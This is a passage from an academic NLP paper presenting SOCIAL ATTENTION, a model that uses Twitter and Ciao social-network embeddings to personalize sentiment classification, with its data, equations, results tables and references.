homophily that is the ba- sis for this research. Note that this differs from the assumption of label homophily, which entails that neighbors in the network will hold similar opinions, and will therefore produce similar document-level labels (Tan et al., 2011; Hu et al., 2013). Linguis- tic homophily is a more generalizable claim, which could in principle be applied to any language pro- cessing task where author network information is available. To scale this basic intuition to datasets with tens of thousands of unique authors, we compress the social network into vector representations of each author node, using an embedding method for large 1Charles Rangel, describing Dick Cheney 2In the case of ‘sick’, speakers like Taylor Swift may em- ploy either the positive and negative meanings, while speak- ers like Charles Rangel employ only the negative meaning. In other cases, communities may maintain completely distinct se- mantics for a word, such as the term ‘pants’ in American and British English. Thanks to Christopher Potts for suggesting this distinction and this example. Dataset # Positive # Negative # Neutral # Tweet Train 2013 3,230 1,265 4,109 8,604 Dev 2013 477 273 614 1,364 Test 2013 1,572 601 1,640 3,813 Test 2014 982 202 669 1,853 Test 2015 1,038 365 987 2,390 Table 1: Statistics of the SemEval Twitter sentiment datasets. scale networks (Tang et al., 2015b). Applying the algorithm to Figure 1, the authors within each triad would likely be closer to each other than to authors in the opposite triad. We then incorporate these embeddings into an attention-based neural network model, called SOCIAL ATTENTION, which employs multiple basis models to focus on different regions of the social network. We apply SOCIAL ATTENTION to Twitter senti- ment classification, gathering social network meta- data for Twitter users in the SemEval Twitter sen- timent analysis tasks (Nakov et al., 2013). We fur- ther adopt the system to Ciao product reviews (Tang et al., 2012), training author embeddings using trust relationships between reviewers. SOCIAL ATTEN- TION offers a 2-3% improvement over related neu- ral and ensemble architectures in which the social information is ablated. It also outperforms all prior published results on the SemEval Twitter test sets. 2 Data In the SemEval Twitter sentiment analysis tasks, the goal is to classify the sentiment of each message as positive, negative, or neutral. Following Rosen- thal et al. (2015), we train and tune our systems on the SemEval Twitter 2013 training and devel- opment datasets respectively, and evaluate on the 2013–2015 SemEval Twitter test sets. Statistics of these datasets are presented in Table 1. Our train- ing and development datasets lack some of the orig- inal Twitter messages, which may have been deleted since the datasets were constructed. However, our test datasets contain all the tweets used in the Se- mEval evaluations, making our results comparable with prior work. We construct three author social networks based on the follow, mention, and retweet relations be- tween the 7,438 authors in the training dataset, 296 which we refer as FOLLOWER, MENTION and RETWEET.3 Specifically, we use the Twitter API to crawl the friends of the SemEval users (individuals that they follow) and the most recent 3,200 tweets in their timelines.4 The mention and retweet links are then extracted from the tweet text and metadata. We treat all social networks as undirected graphs, where two users are socially connected if there ex- ists at least one social relation between them. 3 Linguistic Homophily The hypothesis of linguistic homophily is that so- cially connected individuals tend to use language similarly, as compared to a randomly selected pair of individuals who are not socially connected. We now describe a pilot study that provides support for this hypothesis, focusing on the domain of sentiment analysis. The purpose of this study is to test whether errors in sentiment analysis are assortative on the social networks defined in the previous section: that is, if two individuals (i,j) are connected in the net- work, then a classifier error on i suggests that errors on j are more likely. We test this idea using a simple lexicon-based classification approach, which we apply to the Se- mEval training data, focusing only on messages that are labeled as positive or negative (ignoring the neu- tral class), and excluding authors who contributed more than one message (a tiny minority). Using the social media sentiment lexicons defined by Tang et al. (2014),5 we label a message as positive if it has at least as many positive words as negative words, and as negative otherwise.6 The assortativity is the frac- tion of dyads for which the classifier makes two cor- rect predictions or two incorrect predictions (New- man, 2003). This measures whether classification errors are clustered on the network. We compare the observed assortativity against the assortativity in a network that has been randomly 3We could not gather the authorship information of 10% of the tweets in the training data, because the tweets or user ac- counts had been deleted by the time we crawled the social in- formation. 4The Twitter API returns a maximum of 3,200 tweets. 5The lexicons include words that are assigned at least 0.99 confidence by the method of Tang et al. (2014): 1,474 positive and 1,956 negative words in total. 6Ties go to the positive class because it is more common. rewired.7 Each rewiring epoch involves a number of random rewiring operations equal to the total num- ber of edges in the network. (The edges are ran- domly selected, so a given edge may not be rewired in each epoch.) By counting the number of edges that occur in both the original and rewired networks, we observe that this process converges to a steady state after three or four epochs. As shown in Fig- ure 2, the original observed network displays more assortativity than the randomly rewired networks in nearly every case. Thus, the Twitter social networks display more linguistic homophily than we would expect due to chance alone. The differences in assortativity across network types are small, indicating that none of the networks are clearly best. The retweet network was the most difficult to rewire, with the greatest proportion of shared edges between the original and rewired net- works. This may explain why the assortativities of the randomly rewired networks were closest to the observed network in this case. 4 Model In this section, we describe a neural network method that leverages social network information to improve text classification. Our approach is inspired by en- semble learning, where the system prediction is the weighted combination of the outputs of several ba- sis models. We encourage each basis model to focus on a local region of the social network, so that clas- sification on socially connected individuals employs similar model combinations. Given a set of instances {xi} and authors {ai}, the goal of personalized probabilistic classification is to estimate a conditional label distribution p(y | x,a). For most authors, no labeled data is avail- able, so it is impossible to estimate this distribution directly. We therefore make a smoothness assump- tion over a social network G: individuals who are socially proximate in G should have similar classi- fiers. This idea is put into practice by modeling the conditional label distribution as a mixture over the 7Specifically, we use the double edge swap operation of the networkx package (Hagberg et al., 2008). This opera- tion preserves the degree of each node in the network. 297 Figure 2: Assortativity of observed and randomized networks. Each rewiring epoch performs a number of rewiring operations equal to the total number of edges in the network. The randomly rewired networks almost always display lower assortativities than the original network, indicating that the accuracy of the lexicon-based sentiment analyzer is more assortative on the observed social network than one would expect by chance. predictions of K basis classifiers, p(y | x,a) = K∑ k=1 Pr(Za = k | a,G) ×p(y | x,Za = k). (1) The basis classifiers p(y | x,Za = k) can be arbi- trary conditional distributions; we use convolutional neural networks, as described in § 4.2. The compo- nent weighting distribution Pr(Za = k | a,G) is conditioned on the social network G, and functions as an attentional mechanism, described in § 4.1. The basic intuition is that for a pair of authors ai and aj who are nearby in the social network G, the pre- diction rules should behave similarly if the atten- tional distributions are similar, p(z | ai,G) ≈ p(z | aj,G). If we have labeled data only for ai, some of the personalization from that data will be shared by aj. The overall classification approach can be viewed as a mixture of experts (Jacobs et al., 1991), leveraging the social network as side information to choose the distribution over experts for each author. 4.1 Social Attention Model The goal of the social attention model is to assign similar basis weights to authors who are nearby in the social network G. We operationalize social prox- imity by embedding each node’s social network po- sition into a vector representation. Specifically, we employ the LINE method (Tang et al., 2015b), which estimates D(v) dimensional node embeddings va as parameters in a probabilistic model over edges in the social network. These embeddings are learned solely from the social network G, without leveraging any textual information. The attentional weights are then computed from the embeddings using a soft- max layer, Pr(Za = k | a,G) = exp ( φ>k va + bk ) ∑K k′ exp ( φ>k′va + bk′ ). (2) This embedding method uses only single- relational networks; in the evaluation, we will show results for Twitter networks built from networks of follow, mention, and retweet relations. In future work, we may consider combining all of these rela- tion types into a unified multi-relational network. It is possible that embeddings in such a network could be estimated using techniques borrowed from multi- relational knowledge networks (Bordes et al., 2014; Wang et al., 2014). 4.2 Sentiment Classification with Convolutional Neural Networks We next describe the basis models, p(y | x,Z = k). Because our target task is classification on microtext documents, we model this distribution using convo- lutional neural networks (CNNs; Lecun et al., 1989), which have been proven to perform well on sentence classification tasks (Kalchbrenner et al., 2014; Kim, 2014). CNNs apply layers of convolving filters to n-grams, thereby generating a vector of dense lo- cal features. CNNs improve upon traditional bag- of-words models because of their ability to capture word ordering information. Let x = [h1,h2, · · · ,hn] be the input sentence, where hi is the D(w) dimensional word vector cor- responding to the i-th word in the sentence. We use 298 one convolutional layer and one max pooling layer to generate the sentence representation of x. The convolutional layer involves filters that are applied to bigrams to produce feature maps. Formally, given the bigram word vectors hi,hi+1, the features gen- erated by m filters can be computed by ci = tanh(WLhi + WRhi+1 + b), (3) where ci is an m dimensional vector, WL and WR are m×D(w) projection matrices, and b is the bias vector. The m dimensional vector representation of the sentence is given by the pooling operation s = max i∈1,··· ,n−1 ci. (4) To obtain the conditional label probability, we uti- lize a multiclass logistic regression model, Pr(Y = t | x,Z = k) = exp(β > t sk + βt)∑T t′=1 exp(β > t′ sk + βt′ ) , (5) where βt is an m dimensional weight vector, βt is the corresponding bias term, and sk is the m dimen- sional sentence representation produced by the k-th basis model. 4.3 Training We fix the pretrained author and word embeddings during training our social attention model. Let Θ denote the parameters that need to be learned, which include {WL,WR,b,{βt,βt}Tt=1} for ev- ery basis CNN model, and the attentional weights {φk,bk}Kk=1. We minimize the following logistic loss objective for each training instance: `(Θ) = − T∑ t=1 1[Y ∗ = t] log Pr(Y = t | x,a), (6) where Y ∗ is the ground truth class for x, and 1[·] represents an indicator function. We train the mod- els for between 10 and 15 epochs using the Adam optimizer (Kingma and Ba, 2014), with early stop- ping on the development set. 4.4 Initialization One potential problem is that after initialization, a small number of basis models may claim most of the mixture weights for all the users, while other basis models are inactive. This can occur because some basis models may be initialized with parameters that are globally superior. As a result, the “dead” ba- sis models will receive near-zero gradient updates, and therefore can never improve. The true model capacity can thereby be substantially lower than the K assigned experts. Ideally, dead basis models will be avoided be- cause each basis model should focus on a unique region of the social network. To ensure that this happens, we pretrain the basis models using an in- stance weighting approach from the domain adapta- tion literature (Jiang and Zhai, 2007). For each basis model k, each author a has an instance weight αa,k. These instance weights are based on the author’s so- cial network node embedding, so that socially prox- imate authors will have high weights for the same basis models. This is ensured by endowing each ba- sis model with a random vector γk ∼ N(0,σ2I), and setting the instance weights as, αa,k = sigmoid(γ > k va). (7) The simple design results in similar instance weights for socially proximate authors. During pre- training, we train the k-th basis model by optimizing the following loss function for every instance: `k = −αa,k T∑ t=1 1[Y ∗ = t] log Pr(Y = t | x,Za = k). (8) The pretrained basis models are then assembled to- gether and jointly trained using Equation 6. 5 Experiments Our main evaluation focuses on the 2013–2015 SemEval Twitter sentiment analysis tasks. The datasets have been described in § 2. We train and tune our systems on the Train 2013 and Dev 2013 datasets respectively, and evaluate on the Test 2013– 2015 sets. In addition, we evaluate on another dataset based on Ciao product reviews (Tang et al., 2012). 5.1 Social Network Expansion We utilize Twitter’s follower, mention, and retweet social networks to train user embeddings. By query- ing the Twitter API in April 2015, we were able 299 Network # Author # Relation FOLLOWER+ 18,281 1,287,260 MENTION+ 25,007 1,403,369 RETWEET+ 35,376 2,194,319 Table 2: Statistics of the author social networks used for training author embeddings. to identify 15,221 authors for the tweets in the Se- mEval datasets described above. We induce so- cial networks for these individuals by crawling their friend links and timelines, as described in § 2. Un- fortunately, these networks are relatively sparse, with a large amount of isolated author nodes. To improve the quality of the author embeddings, we expand the set of author nodes by adding nodes that do the most to densify the author networks: for the follower network, we add additional individu- als that are followed by at least a hundred authors in the original set; for the mention and retweet net- works, we add all users that have been mentioned or retweeted by at least twenty authors in the origi- nal set. The statistics of the resulting networks are presented in Table 2. 5.2 Experimental Settings We employ the pretrained word embeddings used by Astudillo et al. (2015), which are trained with a cor- pus of 52 million tweets, and have been shown to perform very well on this task. The embeddings are learned using the structured skip-gram model (Ling et al., 2015), and the embedding dimension is set at 600, following Astudillo et al. (2015). We re- port the same evaluation metric as the SemEval chal- lenge: the average F1 score of positive and negative classes.8 Competitive systems We consider five competi- tive Twitter sentiment classification methods. Con- volutional neural network (CNN) has been de- scribed in § 4.2, and is the basis model of SOCIAL ATTENTION. Mixture of experts employs the same CNN model as an expert, but the mixture densi- 8Regarding the neutral class: systems are penalized with false positives when neutral tweets are incorrectly classified as positive or negative, and with false negatives when positive or negative tweets are incorrectly classified as neutral. This fol- lows the evaluation procedure of the SemEval challenge. ties solely depend on the input values. We adopt the summation of the pretrained word embeddings as the sentence-level input to learn the gating func- tion.9 The model architecture of random attention is nearly identical to SOCIAL ATTENTION: the only distinction is that we replace the pretrained author embeddings with random embedding vectors, draw- ing uniformly from the interval (−0.25, 0.25). Con- catenation concatenates the author embedding with the sentence representation obtained from CNN, and then feeds the new representation to a softmax clas- sifier. Finally, we include SOCIAL ATTENTION, the attention-based neural network method described in § 4. We also compare against the three top-performing systems in the SemEval 2015 Twitter sentiment analysis challenge (Rosenthal et al., 2015): WE- BIS (Hagen et al., 2015), UNITN (Severyn and Mos- chitti, 2015), and LSISLIF (Hamdan et al., 2015). UNITN achieves the best average F1 score on Test 2013–2015 sets among all the submitted systems. Finally, we republish results of NLSE (Astudillo et al., 2015), a non-linear subspace embedding model. Parameter tuning We tune all the hyperparam- eters on the SemEval 2013 development set. We choose the number of bigram filters for the CNN models from {50, 100, 150}. The size of author embeddings is selected from {50, 100}. For mix- ture of experts, random attention and SOCIAL AT- TENTION, we compare a range of numbers of ba- sis models, {3, 5, 10, 15}. We found that a rela- tively small number of basis models are usually suf- ficient to achieve good performance. The number of pretraining epochs is selected from {1, 2, 3}. Dur- ing joint training, we check the performance on the development set after each epoch to perform early stopping. 5.3 Results Table 3 summarizes the main empirical findings, where we report results obtained from author em- beddings trained on RETWEET+ network for SO- CIAL ATTENTION. The results of different social networks for SOCIAL ATTENTION are shown in Ta- ble 4. The best hyperparameters are: 100 bigram 9The summation of the pretrained word embeddings works better than the average of the word embeddings. 300 System Test 2013 Test 2014 Test 2015 Average Our implementations CNN 69.31 72.73 63.24 68.43 Mixture of experts 68.97 72.07 64.28* 68.44 Random attention 69.48 71.56 64.37* 68.47 Concatenation 69.80 71.96 63.80 68.52 SOCIAL ATTENTION 71.91* 75.07* 66.75* 71.24 Reported results NLSE 72.09 73.64 65.21 70.31 WEBIS 68.49 70.86 64.84 68.06 UNITN 72.79 73.60 64.59 70.33 LSISLIF 71.34 71.54 64.27 69.05 Table 3: Average F1 score on the SemEval test sets. The best results are in bold. Results are marked with * if they are significantly better than CNN at p < 0.05. SemEval Test Network 2013 2014 2015 Average FOLLOWER+ 71.49 74.17 66.00 70.55 MENTION+ 71.72 74.14 66.27 70.71 RETWEET+ 71.91 75.07 66.75 71.24 Table 4: Comparison of different social networks with SOCIAL ATTENTION. The best results are in bold. filters; 100-dimensional author embeddings; K = 5 basis models; 1 pre-training epoch. To establish the statistical significance of the results, we obtain 100 bootstrap samples for each test set, and compute the F1 score on each sample for each algorithm. A two- tail paired t-test is then applied to determine if the F1 scores of two algorithms are significantly different, p < 0.05. Mixture of experts, random attention, and CNN all achieve similar average F1 scores on the SemEval Twitter 2013–2015 test sets. Note that random at- tention can benefit from some of the personalized information encoded in the random author embed- dings, as Twitter messages posted by the same au- thor share the same attentional weights. However, it barely improves the results, because the majority of authors contribute a single message in the SemEval datasets. With the incorporation of author social net- work information, concatenation slightly improves the classification performance. Finally, SOCIAL AT- TENTION gives much better results than concatena- tion, as it is able to model the interactions between text representations and author representations. It significantly outperforms CNN on all the SemEval test sets, yielding 2.8% improvement on average F1 score. SOCIAL ATTENTION also performs substan- tially better than the top-performing SemEval sys- tems and NLSE, especially on the 2014 and 2015 test sets. We now turn to a comparison of the social net- works. As shown in Table 4, the RETWEET+ net- work is the most effective, although the differences are small: SOCIAL ATTENTION outperforms prior work regardless of which network is selected. Twit- ter’s “following” relation is a relatively low-cost form of social engagement, and it is less public than retweeting or mentioning another user. Thus it is unsurprising that the follower network is least useful for socially-informed personalization. The RETWEET+ network has denser social connections than MENTION+, which could lead to better author embeddings. 5.4 Analysis We now investigate whether language variation in sentiment meaning has been captured by different basis models. We focus on the same sentiment words (Tang et al., 2014) that we used to test lin- guistic homophily in our analysis. We are inter- ested to discover sentiment words that are used with the opposite sentiment meanings by some authors. To measure the level of model-specificity for each 301 Basis model More positive More negative 1 banging loss fever broken fucking dear like god yeah wow 2 chilling cold ill sick suck satisfy trust wealth strong lmao 3 ass damn piss bitch shit talent honestly voting win clever 4 insane bawling fever weird cry lmao super lol haha hahaha 5 ruin silly bad boring dreadful lovatics wish beliebers arianators kendall Table 5: Top 5 more positive/negative words for the basis models in the SemEval training data. Bolded entries correspond to words that are often used ironically, by top authors related to basis model 1 and 4. Underlined entries are swear words, which are sometimes used positively by top users corresponding to basis model 3. Italic entries refer to celebrities and their fans, which usually appear in negative tweets by top authors for basis model 5. Word Sentiment Example sick positive Watch ESPN tonight to see me burning @user for a sick goal on the top ten. #realbackyardFIFA bitch positive @user bitch u shoulda came with me Saturday sooooo much fun. Met Romeo santos lmao na i met his look a like shit positive @user well shit! I hope your back for the morning show. I need you on my drive to Cupertino on Monday! Have fun! dear negative Dear Spurs, You are out of COC, not in Champions League and come May wont be in top 4. Why do you even exist? wow negative Wow. Tiger fires a 63 but not good enough. Nick Watney shoots a 59 if he birdies the 18th?!? #sick lol negative Lol super awkward if its hella foggy at Rim tomorrow and the games suppose to be on tv lol Uhhhh.. Where’s the ball? Lol Table 6: Tweet examples that contain sentiment words conveying specific sentiment meanings that differ from their common senses in the SemEval training data. The sentiment labels are adopted from the SemEval annotations. word w, we compute the difference between the model-specific probabilities p(y | X = w,Z = k) and the average probabilities of all basis models 1 K ∑K k=1 p(y | X = w,Z = k) for positive and neg- ative classes. The five words in the negative and pos- itive lexicons with the highest scores for each model are presented in Table 5. As shown in Table 5, Twitter users correspond- ing to basis models 1 and 4 often use some words ironically in their tweets. Basis model 3 tends to assign positive sentiment polarity to swear words, and Twitter users related to basis model 5 seem to be less fond of fans of certain celebrities. Finally, basis model 2 identifies Twitter users that we have described in the introduction—they often adopt gen- eral negative words like ‘ill’, ‘sick’, and ‘suck’ posi- tively. Examples containing some of these words are shown in Table 6. 5.5 Sentiment Analysis of Product Reviews The labeled datasets for Twitter sentiment analysis are relatively small; to evaluate our method on a larger dataset, we utilize a product review dataset by Tang et al. (2012). The dataset consists of 257,682 reviews written by 10,569 users crawled from a popular product review sites, Ciao.10 The rating information in discrete five-star range is avail- able for the reviews, which is treated as the ground truth label information for the reviews. Moreover, the users of this site can mark explicit “trust” rela- tionships with each other, creating a social network. To select examples from this dataset, we first re- moved reviews that were marked by readers as “not useful.” We treated reviews with more than three stars as positive, and less than three stars as nega- tive; reviews with exactly three stars were removed. 10http://www.ciao.co.uk 302 Dataset # Author # Positive # Negative # Review Train Ciao 8,545 63,047 6,953 70,000 Dev Ciao 4,087 9,052 948 10,000 Test Ciao 5,740 17,978 2,022 20,000 Total 9,267 90,077 9,923 100,000 Table 7: Statistics of the Ciao product review datasets. System Test Ciao CNN 78.43 Mixture of experts 78.37 Random attention 79.43* Concatenation 77.99 SOCIAL ATTENTION 80.19** Table 8: Average F1 score on the Ciao test set. The best results are in bold. Results are marked with * and ** if they are significantly better than CNN and random atten- tion respectively, at p < 0.05. We then sampled 100,000 reviews from this set, and split them randomly into training (70%), develop- ment (10%) and test sets (20%). The statistics of the resulting datasets are presented in Table 7. We utilize 145,828 trust relations between 18,999 Ciao users to train the author embeddings. We consider the 10,000 most frequent words in the datasets, and assign them pretrained word2vec embeddings.11 As shown in Table 7, the datasets have highly skewed class distributions. Thus, we use the average F1 score of positive and negative classes as the evalu- ation metic. The evaluation results are presented in Table 8. The best hyperparameters are generally the same as those for Twitter sentiment analysis, except that the optimal number of basis models is 10, and the op- timal number of pretraining epochs is 2. Mixture of experts and concatenation obtain slightly worse F1 scores than the baseline CNN system, but ran- dom attention performs significantly better. In con- trast to the SemEval datasets, individual users of- ten contribute multiple reviews in the Ciao datasets (the average number of reviews from an author is 10.8; Table 7). As an author tends to express similar opinions toward related products, random attention 11https://code.google.com/archive/p/ word2vec is able to leverage the personalized information to improve sentiment analysis. Prior work has inves- tigated the direction, obtaining positive results us- ing speaker adaptation techniques (Al Boni et al., 2015). Finally, by exploiting the social network of trust relations, SOCIAL ATTENTION obtains further improvements, outperforming random attention by a small but significant margin. 6 Related Work Domain adaptation and personalization Do- main adaptation is a classic approach to handling the variation inherent in social media data (Eisen- stein, 2013). Early approaches to supervised do- main adaptation focused on adapting the classifier weights across domains, using enhanced feature spaces (Daumé III, 2007) or Bayesian priors (Chelba and Acero, 2006; Finkel and Manning, 2009). Re- cent work focuses on unsupervised domain adap- tation, which typically works by transforming the input feature space so as to overcome domain dif- ferences (Blitzer et al., 2006). However, in many cases, the data has no natural partitioning into do- mains. In preliminary work, we constructed social network domains by running community detection algorithms on the author social network (Fortunato, 2010). However, these algorithms proved to be un- stable on the sparse networks obtained from social media datasets, and offered minimal performance improvements. In this paper, we convert social net- work positions into node embeddings, and use an attentional component to smooth the classification rule across the embedding space. Personalization has been an active research topic in areas such as speech recognition and information retrieval. Standard techniques for these tasks include linear transformation of model parameters (Legget- ter and Woodland, 1995) and collaborative filter- ing (Breese et al., 1998). These methods have re- cently been adapted to personalized sentiment anal- ysis (Tang et al., 2015a; Al Boni et al., 2015). Su- pervised personalization typically requires labeled training examples for every individual user. In con- trast, by leveraging the social network structure, we can obtain personalization even when labeled data is unavailable for many authors. 303 Sentiment analysis with social relations Previ- ous work on incorporating social relations into sen- timent classification has relied on the label consis- tency assumption, where the existence of social con- nections between users is taken as a clue that the sentiment polarities of the users’ messages should be similar. Speriosu et al. (2011) construct a hetero- geneous network with tweets, users, and n-grams as nodes. Each node is then associated with a senti- ment label distribution, and these label distributions are smoothed by label propagation over the graph. Similar approaches are explored by Hu et al. (2013), who employ the graph Laplacian as a source of reg- ularization, and by Tan et al. (2011) who take a fac- tor graph approach. A related idea is to label the sentiment of individuals in a social network towards each other: West et al. (2014) exploit the sociolog- ical theory of structural balance to improve the ac- curacy of dyadic sentiment labels in this setting. All of these efforts are based on the intuition that indi- vidual predictions p(y) should be smooth across the network. In contrast, our work is based on the in- tuition that social neighbors use language similarly, so they should have a similar conditional distribu- tion p(y | x). These intuitions are complementary: if both hold for a specific setting, then label consis- tency and linguistic consistency could in principle be combined to improve performance. Social relations can also be applied to improve personalized sentiment analysis (Song et al., 2015; Wu and Huang, 2015). Song et al. (2015) present a latent factor model that alleviates the data sparsity problem by decomposing the messages into words that are represented by the weighted sentiment and topic units. Social relations are further incorporated into the model based on the intuition that linked in- dividuals share similar interests with respect to the latent topics. Wu and Huang (2015) build a person- alized sentiment classifier for each author; socially connected users are encouraged to have similar user- specific classifier components. As discussed above, the main challenge in personalized sentiment analy- sis is to obtain labeled data for each individual au- thor. Both papers employ distant supervision, using emoticons to label additional instances. However, emoticons may be unavailable for some authors or even for entire genres, such as reviews. Further- more, the pragmatic function of emoticons is com- plex, and in many cases emoticons do not refer to sentiment (Walther and D’Addario, 2001). Our ap- proach does not rely on distant supervision, and as- sumes only that the classification decision function should be smooth across the social network. 7 Conclusion This paper presents a new method for learning to overcome language variation, leveraging the ten- dency of socially proximate individuals to use lan- guage similarly—the phenomenon of linguistic ho- mophily. By learning basis models that focus on different local regions of the social network, our method is able to capture subtle shifts in meaning across the network. Inspired by ensemble learn- ing, we have formulated this model by employing a social attention mechanism: the final prediction is the weighted combination of the outputs of the ba- sis models, and each author has a unique weight- ing, depending on their position in the social net- work. Our model achieves significant improvements over standard convolutional networks, and ablation analyses show that social network information is the critical ingredient. In other work, language varia- tion has been shown to pose problems for the entire NLP stack, from part-of-speech tagging to informa- tion extraction. A key question for future research is whether we can learn a socially-infused ensemble that is useful across multiple tasks. 8 Acknowledgments We thank Duen Horng “Polo” Chau for discus- sions about community detection and Ramon As- tudillo for sharing data and helping us to reproduce the NLSE results. This research was supported by the National Science Foundation under award RI- 1452443, by the National Institutes of Health un- der award number R01GM112697-01, and by the Air Force Office of Scientific Research. The content is solely the responsibility of the authors and does not necessarily represent the official views of these sponsors. References Mohammad Al Boni, Keira Qi Zhou, Hongning Wang, and Matthew S Gerber. 2015. Model adaptation for 304 personalized opinion analysis. In Proceedings of the Association for Computational Linguistics (ACL). Ramon F Astudillo, Silvio Amir, Wang Ling, Mário Silva, and Isabel Trancoso. 2015. Learning word rep- resentations from scarce and noisy data with embed- ding sub-spaces. In Proceedings of the Association for Computational Linguistics (ACL). AiTi Aw, Min Zhang, Juan Xiao, and Jian Su. 2006. A phrase-based statistical model for SMS text normaliza- tion. In Proceedings of the Association for Computa- tional Linguistics (ACL). Justin Basilico and Thomas Hofmann. 2004. Unify- ing collaborative and content-based filtering. In Pro- ceedings of the International Conference on Machine Learning (ICML). John Blitzer, Ryan McDonald, and Fernando Pereira. 2006. Domain adaptation with structural correspon- dence learning. In Proceedings of Empirical Methods for Natural Language Processing (EMNLP). Su Lin Blodgett, Lisa Green, and Brendan O’Connor. 2016. Demographic dialectal variation in social me- dia: A case study of african-american english. In Pro- ceedings of Empirical Methods for Natural Language Processing (EMNLP). Antoine Bordes, Nicolas Usunier, Alberto Garcia-Duran, Jason Weston, and Oksana Yakhnenko. 2014. Trans- lating embeddings for modeling multi-relational data. In Neural Information Processing Systems (NIPS). John S Breese, David Heckerman, and Carl Kadie. 1998. Empirical analysis of predictive algorithms for collab- orative filtering. In Proceedings of Uncertainty in Ar- tificial Intelligence (UAI). John Bryden, Sebastian Funk, and Vincent Jansen. 2013. Word usage mirrors community structure in the online social network twitter. EPJ Data Science, 2(1). Ciprian Chelba and Alex Acero. 2006. Adaptation of maximum entropy capitalizer: Little data can help a lot. Computer Speech & Language, 20(4). Hal Daumé III. 2007. Frustratingly easy domain adapta- tion. In Proceedings of the Association for Computa- tional Linguistics (ACL). Penelope Eckert and Sally McConnell-Ginet. 2003. Lan- guage and Gender. Cambridge University Press. Jacob Eisenstein, Brendan O’Connor, Noah A. Smith, and Eric P. Xing. 2010. A latent variable model for geographic lexical variation. In Proceedings of Empirical Methods for Natural Language Processing (EMNLP). Jacob Eisenstein. 2013. What to do about bad language on the internet. In Proceedings of the North American Chapter of the Association for Computational Linguis- tics (NAACL). Jacob Eisenstein. 2015. Systematic patterning in phonologically-motivated orthographic variation. Journal of Sociolinguistics, 19. Marcello Federico. 1996. Bayesian estimation methods for n-gram language model adaptation. In Proceed- ings of International Conference on Spoken Language (ICSLP). Jenny R. Finkel and Christopher Manning. 2009. Hier- archical bayesian domain adaptation. In Proceedings of the North American Chapter of the Association for Computational Linguistics (NAACL). John L Fischer. 1958. Social influences on the choice of a linguistic variant. Word, 14. Santo Fortunato. 2010. Community detection in graphs. Physics Reports, 486(3). Lisa J. Green. 2002. African American English: A Lin- guistic Introduction. Cambridge University Press. Aric A. Hagberg, Daniel A Schult, and P Swart. 2008. Exploring network structure, dynamics, and function using networkx. In Proceedings of the 7th Python in Science Conferences (SciPy). Matthias Hagen, Martin Potthast, Michael Büchner, and Benno Stein. 2015. Webis: An ensemble for twitter sentiment detection. In Proceedings of the 9th Inter- national Workshop on Semantic Evaluation. Hussam Hamdan, Patrice Bellot, and Frederic Bechet. 2015. lsislif: Feature extraction and label weighting for sentiment analysis in twitter. In Proceedings of the 9th International Workshop on Semantic Evaluation. Dirk Hovy. 2015. Demographic factors improve classifi- cation performance. In Proceedings of the Association for Computational Linguistics (ACL). Xia Hu, Lei Tang, Jiliang Tang, and Huan Liu. 2013. Ex- ploiting social relations for sentiment analysis in mi- croblogging. In Proceedings of Web Search and Data Mining (WSDM). Bernardo Huberman, Daniel M. Romero, and Fang Wu. 2008. Social networks that matter: Twitter under the microscope. First Monday, 14(1). Robert A Jacobs, Michael I Jordan, Steven J Nowlan, and Geoffrey E Hinton. 1991. Adaptive mixtures of local experts. Neural computation, 3(1). Jing Jiang and ChengXiang Zhai. 2007. Instance weight- ing for domain adaptation in NLP. In Proceedings of the Association for Computational Linguistics (ACL). Nal Kalchbrenner, Edward Grefenstette, and Phil Blun- som. 2014. A convolutional neural network for mod- elling sentences. In Proceedings of the Association for Computational Linguistics (ACL). Yoon Kim. 2014. Convolutional neural networks for sentence classification. In Proceedings of Empirical Methods for Natural Language Processing (EMNLP). 305 Diederik Kingma and Jimmy Ba. 2014. Adam: A method for stochastic optimization. arXiv preprint arXiv:1412.6980. William Labov. 1963. The social motivation of a sound change. Word, 19(3). Yann LeCun, Bernhard Boser, John S Denker, Donnie Henderson, Richard E Howard, Wayne Hubbard, and Lawrence D Jackel. 1989. Backpropagation applied to handwritten zip code recognition. Neural computa- tion, 1(4). Christopher J Leggetter and Philip C Woodland. 1995. Maximum likelihood linear regression for speaker adaptation of continuous density hidden markov mod- els. Computer Speech & Language, 9(2). Wang Ling, Chris Dyer, Alan Black, and Isabel Trancoso. 2015. Two/too simple adaptations of word2vec for syntax problems. In Proceedings of the North Ameri- can Chapter of the Association for Computational Lin- guistics (NAACL). Miller McPherson, Lynn Smith-Lovin, and James M Cook. 2001. Birds of a feather: Homophily in social networks. Annual review of sociology. Preslav Nakov, Zornitsa Kozareva, Alan Ritter, Sara Rosenthal, Veselin Stoyanov, and Theresa Wilson. 2013. Semeval-2013 task 2: Sentiment analysis in twitter. In Proceedings of the 7th International Work- shop on Semantic Evaluation. Mark EJ Newman. 2003. The structure and function of complex networks. SIAM review, 45(2). Sara Rosenthal and Kathleen McKeown. 2011. Age pre- diction in blogs: A study of style, content, and online behavior in pre- and Post-Social media generations. In Proceedings of the Association for Computational Lin- guistics (ACL). Sara Rosenthal, Preslav Nakov, Svetlana Kiritchenko, Saif M Mohammad, Alan Ritter, and Veselin Stoy- anov. 2015. Semeval-2015 task 10: Sentiment analy- sis in twitter. In Proceedings of the 9th International Workshop on Semantic Evaluation. Aliaksei Severyn and Alessandro Moschitti. 2015. Unitn: Training deep convolutional neural network for twitter sentiment classification. In Proceedings of the 9th International Workshop on Semantic Evaluation. Xuehua Shen, Bin Tan, and ChengXiang Zhai. 2005. Im- plicit user modeling for personalized search. In Pro- ceedings of the International Conference on Informa- tion and Knowledge Management (CIKM). Kaisong Song, Shi Feng, Wei Gao, Daling Wang, Ge Yu, and Kam-Fai Wong. 2015. Personalized senti- ment classification based on latent individuality of mi- croblog users. In Proceedings of the 24th Interna- tional Joint Conference on Artificial Intelligence (IJ- CAI). Michael Speriosu, Nikita Sudan, Sid Upadhyay, and Ja- son Baldridge. 2011. Twitter polarity classification with label propagation over lexical links and the fol- lower graph. In Proceedings of Empirical Methods for Natural Language Processing (EMNLP). R. Sproat, A.W. Black, S. Chen, S. Kumar, M. Osten- dorf, and C. Richards. 2001. Normalization of non- standard words. Computer Speech & Language, 15(3). Chenhao Tan, Lillian Lee, Jie Tang, Long Jiang, Ming Zhou, and Ping Li. 2011. User-level sentiment anal- ysis incorporating social networks. In Proceedings of Knowledge Discovery and Data Mining (KDD). Jiliang Tang, Huiji Gao, and Huan Liu. 2012. mtrust: discerning multi-faceted trust in a connected world. In Proceedings of Web Search and Data Mining (WSDM). Duyu Tang, Furu Wei, Bing Qin, Ming Zhou, and Ting Liu. 